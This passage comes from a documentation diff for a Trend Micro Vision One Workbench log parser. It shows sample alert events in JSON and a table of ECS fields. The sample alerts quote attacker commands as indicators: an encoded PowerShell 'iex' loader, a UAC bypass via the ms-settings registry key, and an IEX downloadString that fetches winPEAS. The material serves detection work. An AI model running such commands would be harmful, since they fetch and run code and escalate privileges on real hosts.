[\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"host\", \"field\": \"\", \"value\": {\"guid\": \"\", \"name\": \"99.255.12.39\", \"ips\": [\"99.255.12.39\"]}, \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Lateral Movement Enrichment\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"objectPid\", \"value\": 
\"5552\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"user_account\", \"field\": \"\", \"value\": \"systel.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 21, \"type\": \"user_account\", \"field\": \"\", \"value\": \"srv-serveur\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 22, \"type\": \"user_account\", \"field\": \"\", \"value\": \"daqsan.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Process Injection from Windows Temporary Location to System32", + "type": [ + "info" + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3" + }, + "@timestamp": "2024-07-23T07:49:48Z", + "host": { + "id": "7E8FDBEF-FFF7-4C41-9E33-171366D30299", + "ip": [ + "19.112.87.74" + ], + "name": "CHTX-XMEDICA-2K12.windows10.local" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "SesProbe-31944.exe ", + "executable": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\54\\SesProbe-31944.exe", + "hash": { + "sha1": "3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F", + "sha256": "7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303" + }, + "parent": { + "command_line": "\"C:\\WINDOWS\\system32\\CMD.exe\" /CCD C:\\Users\\USERNAME\\AppData\\Local\\Temp\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\tsclient\\SESPRO\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO 
@START %X%>>S&MOVE /Y S S.BAT&S", + "executable": "C:\\Windows\\System32\\cmd.exe", + "hash": { + "sha256": "A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502" + } + }, + "pid": 5552 + }, + "related": { + "hash": [ + "3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F", + "7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303", + "A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502" + ], + "ip": [ + "19.112.87.74" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "Process Injection from Windows Temporary Location to System32" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "incident_id": "IC-14558-20240722-00000", + "investigation_status": "New", + "severity": "medium", + "status": "Open" + } + }, + "user": { + "domain": "windows10", + "id": "windows10\\jdoe", + "name": "jdoe" + } + } + + ``` + + +=== "test_registry.json" + + ```json + + { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00022\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Privilege Escalation via UAC Bypass\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"firstInvestigatedDateTime\": \"2022-10-06T02:30:31Z\", \"createdDateTime\": \"2022-09-06T02:49:31Z\", \"updatedDateTime\": \"2022-09-06T02:49:48Z\", \"incidentId\": \"IC-1-20230706-00001\", \"caseId\": \"CL-1-20230706-00001\", \"ownerIds\": [\"12345678-1234-1234-1234-123456789012\"], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 1, \"containerCount\": 1, \"cloudIdentityCount\": 1, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], 
\"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Alert\"]}, {\"entityType\": \"emailAddress\", \"entityValue\": \"support@pctutordetroit.com\", \"entityId\": \"SUPPORT@PCTUTORDETROIT.COM\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"container\", \"entityValue\": \"k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0\", \"entityId\": \"7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"cloudIdentity\", \"entityValue\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"entityId\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user bypassed User Account Control (UAC) to gain higher-level permissions.\", \"matchedRules\": [{\"id\": \"25d96e5d-cb69-4935-ae27-43cc0cdca1cc\", \"name\": \"(T1088) Bypass UAC via shell open registry\", \"matchedFilters\": [{\"id\": \"ac200e74-8309-463e-ad6b-a4c16a3a377f\", \"name\": \"Bypass UAC Via Shell Open Default Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"a32599b7-c0c9-45ed-97bf-f2be7679fb00\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", 
\"type\": \"TELEMETRY_REGISTRY\"}]}, {\"id\": \"857b6396-da29-44a8-bc11-25298e646795\", \"name\": \"Bypass UAC Via Shell Open Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"T1088\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"4c456bbb-2dfc-40a5-b298-799a0ccefc01\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....jY0KTtpZXggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], 
\"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"registry_value\", \"field\": \"objectRegistryValue\", \"value\": \"delegateexecute\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"registry_value_data\", \"field\": \"objectRegistryData\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Privilege Escalation via UAC Bypass", + "type": [ + "info" + ], + "url": "https://THE_WORKBENCH_URL" + }, + "@timestamp": "2022-09-06T02:49:31Z", + "container": { + "id": "7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496", + "name": "k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0" + }, + "host": { + "id": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E", + "ip": [ + "10.10.58.51" + ], + "name": "nimda" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": 
"c:\\windows\\system32\\rundll32.exe c:\\users\\sam\\appdata\\local\\cyzfc.dat entrypoint", + "parent": { + "command_line": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; " + } + }, + "registry": { + "data": { + "strings": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x", + "type": "REG_SZ" + }, + "hive": "hkcr", + "key": "ms-settings\\shell\\open\\command", + "path": "hkcr\\ms-settings\\shell\\open\\command\\hkcr\\ms-settings\\shell\\open\\command\\delegateexecute", + "value": "delegateexecute" + }, + "related": { + "ip": [ + "10.10.58.51" + ], + "user": [ + "sam" + ] + }, + "rule": { + "name": "Privilege Escalation via UAC Bypass" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-9002-20220906-00022", + "case_id": "CL-1-20230706-00001", + "incident_id": "IC-1-20230706-00001", + "investigation_status": "New", + "severity": "high", + "status": "Open" + } + }, + "user": { + "domain": "shockwave", + "email": "support@pctutordetroit.com", + "id": "shockwave\\sam", + "name": "sam" + } + } + + ``` + + +=== "test_service_abuse.json" + + ```json + + { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"ce2af827-6dfc-4c5b-ab40-ab4b82351c83\", \"model\": \"Possible Web Service Abuse\", \"modelType\": \"preset\", \"score\": 39, \"severity\": \"medium\", \"createdDateTime\": \"2024-11-26T16:45:28Z\", \"updatedDateTime\": \"2024-11-26T16:45:28Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, 
\"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"name\": \"windows10\", \"ips\": [\"20.193.45.33\"]}, \"entityId\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"ce9c7ad6-f895-4907-bf57-e34b59d4dc90\"}]}, \"description\": \"The adversary attempted to download a payload stored on a legitimate external web service.\", \"matchedRules\": [{\"id\": \"ef13e37e-148e-48d6-819f-021f4acfcace\", \"name\": \"Suspicious Powershell Connection To Web Service\", \"matchedFilters\": [{\"id\": \"97e70752-3b27-4db0-b840-507d3f37ffe6\", \"name\": \"Suspicious Powershell Connection To Web Service - Variant 2\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"mitreTechniqueIds\": [\"T1102\"], \"matchedEvents\": [{\"uuid\": \"4aed361f-de80-4679-bf18-608b2afe5ff7\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"type\": \"TELEMETRY_AMSI\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"<#\\n.SYNOPSIS\\n PowerShell adaptation of WinPEAS.exe / WinPeas.bat\\n.DESCRIPTION\\n For the 
legal enumeration of windows based computers that you either own or are approved to run this script on\\n.EXAMPLE\\n # Default - normal operation with username/password audit in drives/registry\\n .\\\\winPeas.ps1\\n\\n # Include Excel files in search: .xls, .xlsx, .xlsm\\n .\\\\winPeas.ps1 -Excel\\n\\n # Full audit - normal operation with APIs / Keys / Tokens\\n ## This will produce false positives ## \\n .\\\\winPeas.ps1 -FullCheck \\n\\n # Add Time stamps to each command\\n .\\\\winPeas.ps1 -TimeStamp\\n\\n.NOTES\\n Version: 1.3\\n PEASS-ng Original Author: PEASS-ng\\n winPEAS.ps1 Author: @RandolphConley\\n Creation Date: 10/4/2022\\n Website: https://github.com/peass-ng/PEASS-ng\\n\\n TESTED: PoSh 5,7\\n UNTESTED: PoSh 3,4\\n NOT FULLY COMPATIBLE: PoSh 2 or lower\\n#>\\n\\n######################## FUNCTIONS ########################\\n\\n[CmdletBinding()]\\nparam(\\n [switch]$TimeStamp,\\n [switch]$FullCheck,\\n [switch]$Excel\\n)\\n\\n# Gather KB from all patches installed\\nfunction returnHotFixID {\\n param(\\n [string]$title\\n )\\n # Match on KB or if patch does not have a KB, return end result\\n if (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n elseif (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n}\\n\\nFunction Start-ACLCheck {\\n param(\\n $Target, $ServiceName)\\n # Gather ACL of object\\n if ($null -ne $target) {\\n try {\\n $ACLObject = Get-Acl $target -ErrorAction SilentlyContinue\\n }\\n catch { $null }\\n \\n # If Found, Evaluate Permissions\\n if ($ACLObject) { \\n $Identity = @()\\n $Identity += \\\"$env:COMPUTERNAME\\\\$env:USERNAME\\\"\\n if ($ACLObject.Owner -like $Identity ) { Write-Host \\\"$Identity has ownership of $Target\\\" -ForegroundColor Red }\\n # This should now work for any 
language. Command runs whoami group, removes the first two line of output, converts from csv to object, but adds \\\"group name\\\" to the first column.\\n whoami.exe /groups /fo csv | select-object -skip 2 | ConvertFrom-Csv -Header 'group name' | Select-Object -ExpandProperty 'group name' | ForEach-Object { $Identity += $_ }\\n $IdentityFound = $false\\n foreach ($i in $Identity) {\\n $permission = $ACLObject.Access | Where-Object { $_.IdentityReference -like $i }\\n $UserPermission = \\\"\\\"\\n switch -WildCard ($Permission.FileSystemRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n \\\"Write*\\\" { $userPermission = \\\"Write\\\"; $IdentityFound = $true }\\n \\\"Modify\\\" { $userPermission = \\\"Modify\\\"; $IdentityFound = $true }\\n }\\n Switch ($permission.RegistryRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n }\\n if ($UserPermission) {\\n if ($ServiceName) { Write-Host \\\"$ServiceName found with permissions issue:\\\" -ForegroundColor Red }\\n Write-Host -ForegroundColor red \\\"Identity $($permission.IdentityReference) has '$userPermission' perms for $Target\\\"\\n }\\n } \\n # Identity Found Check - If False, loop through and stop at root of drive\\n if ($IdentityFound -eq $false) {\\n if ($Target.Length -gt 3) {\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target -ServiceName $ServiceName\\n }\\n }\\n }\\n else {\\n # If not found, split path one level and Check again\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target $ServiceName\\n }\\n }\\n}\\n\\nFunction UnquotedServicePathCheck {\\n Write-Host \\\"Fetching the list of services, this may take a while...\\\";\\n $services = Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName -inotmatch \\\"`\\\"\\\" -and $_.PathName -inotmatch \\\":\\\\\\\\Windows\\\\\\\\\\\" -and ($_.StartMode -eq \\\"Auto\\\" -or $_.StartMode -eq \\\"Manual\\\") -and ($_.State -eq \\\"Running\\\" -or 
$_.State -eq \\\"Stopped\\\") };\\n if ($($services | Measure-Object).Count -lt 1) {\\n Write-Host \\\"No unquoted service paths were found\\\";\\n }\\n else {\\n $services | ForEach-Object {\\n Write-Host \\\"Unquoted Service Path found!\\\" -ForegroundColor red\\n Write-Host Name: $_.Name\\n Write-Host PathName: $_.PathName\\n Write-Host StartName: $_.StartName \\n Write-Host StartMode: $_.StartMode\\n Write-Host Running: $_.State\\n } \\n }\\n}\\n\\nfunction TimeElapsed { Write-Host \\\"Time Running: $($stopwatch.Elapsed.Minutes):$($stopwatch.Elapsed.Seconds)\\\" }\\nFunction Get-ClipBoardText {\\n Add-Type -AssemblyName PresentationCore\\n $text = [Windows.Clipboard]::GetText()\\n if ($text) {\\n Write-Host \\\"\\\"\\n if ($TimeStamp) { TimeElapsed }\\n Write-Host -ForegroundColor Blue \\\"=========|| ClipBoard text found:\\\"\\n Write-Host $text\\n \\n }\\n}\\n\\nFunction Search-Excel {\\n [cmdletbinding()]\\n Param (\\n [parameter(Mandatory, ValueFromPipeline)]\\n [ValidateScript({\\n Try {\\n If (Test-Path -Path $_) {$True}\\n \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF\", \"relatedEntities\": 
[\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Windows10\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Possible Web Service Abuse", + "type": [ + "info" + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000" + }, + "@timestamp": "2024-11-26T16:45:28Z", + "action": { + "properties": { + "ScriptBlockText": "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')" + } + }, + "host": { + "id": "e930412e-e09c-454b-a508-576ba266b9d8", + "ip": [ + "20.193.45.33" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ", + "executable": 
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", + "hash": { + "sha256": "440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF" + }, + "parent": { + "command_line": "C:\\Windows\\Explorer.EXE", + "pid": 9920 + }, + "pid": 5040 + }, + "related": { + "hash": [ + "440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF" + ], + "ip": [ + "20.193.45.33" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "Possible Web Service Abuse" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": "New", + "severity": "medium", + "status": "Open" + } + }, + "user": { + "domain": "windows10", + "id": "windows10\\jdoe", + "name": "jdoe" + } + } + + ``` + + + + + +### Extracted Fields + +The following table lists the fields that are extracted, normalized under the ECS format, analyzed and indexed by the parser. It should be noted that infered fields are not listed. + +| Name | Type | Description | +| ---- | ---- | ---------------------------| +|`@timestamp` | `date` | Date/time when the event originated. | +|`action.properties.ScriptBlockText` | `keyword` | | +|`container.id` | `keyword` | Unique container id. | +|`container.name` | `keyword` | Container name. | +|`event.action` | `keyword` | The action captured by the event. | +|`event.category` | `keyword` | Event category. The second categorization field in the hierarchy. | +|`event.kind` | `keyword` | The kind of the event. The highest categorization field in the hierarchy. | +|`event.reason` | `keyword` | Reason why this event happened, according to the source | +|`event.type` | `keyword` | Event type. The third categorization field in the hierarchy. | +|`event.url` | `keyword` | Event investigation URL | +|`file.hash.sha1` | `keyword` | SHA1 hash. | +|`file.hash.sha256` | `keyword` | SHA256 hash. | +|`file.name` | `keyword` | Name of the file including the extension, without the directory. 
| +|`file.path` | `keyword` | Full path to the file, including the file name. | +|`host.id` | `keyword` | Unique host id. | +|`host.ip` | `ip` | Host ip addresses. | +|`host.name` | `keyword` | Name of the host. | +|`observer.product` | `keyword` | The product name of the observer. | +|`observer.vendor` | `keyword` | Vendor name of the observer. | +|`process.command_line` | `wildcard` | Full command line that started the process. | +|`process.executable` | `keyword` | Absolute path to the process executable. | +|`process.hash.sha1` | `keyword` | SHA1 hash. | +|`process.hash.sha256` | `keyword` | SHA256 hash. | +|`process.parent.command_line` | `wildcard` | Full command line that started the process. | +|`process.parent.executable` | `keyword` | Absolute path to the process executable. | +|`process.parent.hash.sha1` | `keyword` | SHA1 hash. | +|`process.parent.hash.sha256` | `keyword` | SHA256 hash. | +|`process.parent.pid` | `long` | Process id. | +|`process.pid` | `long` | Process id. | +|`registry.data.strings` | `wildcard` | List of strings representing what was written to the registry. | +|`registry.data.type` | `keyword` | Standard registry type for encoding contents | +|`registry.hive` | `keyword` | Abbreviated name for the hive. | +|`registry.key` | `keyword` | Hive-relative path of keys. | +|`registry.path` | `keyword` | Full path, including hive, key and value | +|`registry.value` | `keyword` | Name of the value written. | +|`rule.id` | `keyword` | Rule ID | +|`rule.name` | `keyword` | Rule name | +|`trendmicro.vision_one.alert_id` | `keyword` | | +|`trendmicro.vision_one.case_id` | `keyword` | | +|`trendmicro.vision_one.detection_name` | `keyword` | | +|`trendmicro.vision_one.incident_id` | `keyword` | | +|`trendmicro.vision_one.investigation_status` | `keyword` | | +|`trendmicro.vision_one.severity` | `keyword` | | +|`trendmicro.vision_one.status` | `keyword` | | +|`user.domain` | `keyword` | Name of the directory the user is a member of. 
| +|`user.email` | `keyword` | User email address. | +|`user.id` | `keyword` | Unique identifier of the user. | +|`user.name` | `keyword` | Short name or login of the user. | + + + +For more information on the Intake Format, please find the code of the Parser, Smart Descriptions, and Supported Events [here](https://github.com/SEKOIA-IO/intake-formats/tree/main/Trend Micro/trend-micro-vision-one-workbench). \ No newline at end of file diff --git a/_shared_content/operations_center/integrations/generated/9844ea0a-de7f-45d4-9a9b-b07651f0630e_sample.md b/_shared_content/operations_center/integrations/generated/9844ea0a-de7f-45d4-9a9b-b07651f0630e_sample.md new file mode 100644 index 000000000..e73f41b2e --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/9844ea0a-de7f-45d4-9a9b-b07651f0630e_sample.md 
